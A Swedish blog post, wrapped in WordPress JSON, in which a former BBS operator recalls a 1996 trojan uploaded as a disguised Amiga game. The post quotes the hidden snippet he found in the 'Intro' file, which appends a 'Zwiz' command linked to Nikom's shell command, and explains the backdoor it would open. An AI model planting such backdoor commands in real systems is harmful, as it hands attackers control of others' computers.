F\u00f6r den som fortfarande tror hackare \u00e4r en ny f\u00f6reteelse, l\u00e5t mig ber\u00e4tta om trojanen vi utsattes f\u00f6r 1996. Allts\u00e5 en trojan \u00e4r ett till synes oskyldigt program som inneh\u00e5ller dold skadlig kod eller n\u00e5gon form av annat program som g\u00f6r o\u00f6nskade saker. Eller som i detta fall, installerar en bakd\u00f6rr in i systemet.<\/p>\n\n\n\n
Peter eriksson (anv\u00e4ndare nummer #274 efter kraschen 1995) laddade upp spelet Giana-sisters i min Amiga area. Han f\u00f6rs\u00f6kte maskera det som ett public domainspel kallat ”Giga system II”. Spelet \u00e5kte ner direkt eftersom jag inte till\u00e4t piratkopior. Men n\u00e5got drog mitt intresse till sig. Spelet startades med ett skript kallat Giana. Det kallade i sin tur den k\u00f6rbara filen Intro och sedan spelet gs.exe. Spelet f\u00f6rstod jag men intro-filen hamnade i en hexeditor f\u00f6r vidare analys och titta vad jag hittade:<\/p>\n\n\n\n
”Nikom:tick.txt dos.library type Nikom:tick.txt >>Nikom:Datocfg\/Kommandon.cfg
N=Zwiz
S=0
O=1
#=523
X=house” <\/p>\n\n\n\n
Ok om ni inte f\u00f6rst\u00e5r det, till\u00e5t mig f\u00f6rklara. Det l\u00e4gger till n\u00e5gra rader i BBS-systemet Nikoms kommandolista. Det nya kommandot heter Zwiz och \u00e4r en l\u00e4nk till det interna kommandot 523. En snabb koll Nikoms dokumentation visar att detta \u00e4r system-kommandot, som ger en dosprompt rakt ut i Amigados. S\u00e5 om Sysop \u00e4r dum nog att k\u00f6ra kommandot, har han effektivt installerat en backdoor i sin BBS som anv\u00e4ndaren kan anv\u00e4nda f\u00f6r att ta kommandot \u00f6ver hela datorn och g\u00f6ra vad han vill med den.<\/p>\n\n\n\n
Vi kan \u00e4ven ta en titt p\u00e5 filbeskrivningen:
\n”GSII.LHA 0 1 0 262718 960601 1358 274
\nGiga System II. C00l PD spel,..”<\/p>\n\n\n\n
Peter Eriksson beh\u00f6ver givetvis inte vara skyldig. Han kan ha laddat upp filerna i god tro, \u00e4ven om jag st\u00e4ller mig lite tvivlande till det. Jag f\u00f6rl\u00e4t honom nog eftersom han var aktiv p\u00e5 BBS:en ett halv\u00e5r senare enligt vad jag kan se.<\/p>\n\n\n\n
Det \u00e4r s\u00e5 l\u00e5ngt vi kommer. Jag vet inte om datumet \u00e4r n\u00e4r filen flyttades till arean BAD (filer som refuserats) eller n\u00e4r han laddade upp den. Den kan ha laddats upp tidigare p\u00e5 andra system, se datumen p\u00e5 filerna inne i arkivet:<\/p>\n\n\n\n
1992-09-02 13:08 13 Giana
\n1996-05-13 22:28 6 575 Giana.info
\n1996-05-13 22:28 295 712 GS.EXE
\n1992-09-02 13:07 348 Intro<\/p>\n\n\n\n
Det verkar som om sj\u00e4lva trojan-koden \u00e4r fr\u00e5n 1992, medan en sj\u00e4lva spelet lades in senare. D\u00e4remot batchfilen ”Giana” verkar ocks\u00e5 vara fr\u00e5n 1992, s\u00e5 det \u00e4r inte helt klart att det anv\u00e4nds till ett annat spel eller program. Tidsst\u00e4mplarna \u00e4r inte heller s\u00e4rskilt tillf\u00f6rlitliga sanningsvittnen, s\u00e5 det \u00e4r inte m\u00f6jligt att s\u00e4ga s\u00e5 mycket om filerna. Fr\u00e5gan \u00e4r om Peter visste vad han gjorde eller inte. Jag kan mycket v\u00e4l ha varit f\u00f6r sn\u00e4ll och antagit att han var oskyldig, men han VISSTE att vi inte till\u00e4t piratkopierade spel och verkar d\u00e5 ha \u00e4ndrat spelets namn f\u00f6r att komma f\u00f6rbi detta. S\u00e5 i efterhand har jag sv\u00e5rt att tro att han var oskyldig. Fr\u00e5gan \u00e4r vad han hade gjort om han lyckats f\u00e5 administrativ beh\u00f6righet till basen. Hade han ha raderat h\u00e5rddisken eller laddat hem filer eller gett sig sj\u00e4lv h\u00f6gre status i basen? Vi f\u00e5r aldrig veta.<\/p>\n","protected":false},"excerpt":{"rendered":"
F\u00f6r den som fortfarande tror hackare \u00e4r en ny f\u00f6reteelse, l\u00e5t mig ber\u00e4tta om trojanen vi utsattes f\u00f6r 1996. Allts\u00e5 en trojan \u00e4r ett till synes oskyldigt program som inneh\u00e5ller dold skadlig kod eller n\u00e5gon form av annat program som g\u00f6r o\u00f6nskade saker. Eller som i detta fall, installerar en bakd\u00f6rr in i systemet. Peter… Forts\u00e4tt l\u00e4sa hack-attacken<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[3],"tags":[],"class_list":["post-404","post","type-post","status-publish","format-standard","hentry","category-basens-historia","entry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paX1Ep-6w","_links":{"self":[{"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/the.ericade.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=404"}],"version-history":[{"count":3,"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/posts\/404\/revisions"}],"predecessor-version":[{"id":443,"href":"https:\/\/the.ericade.net\/index.php?rest_route=\/wp\/v2\/posts\/404\/revisions\/443"}],"wp:attachment":[{"href":"https:\/\/the.ericade.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/the.ericade.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/the.ericade.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}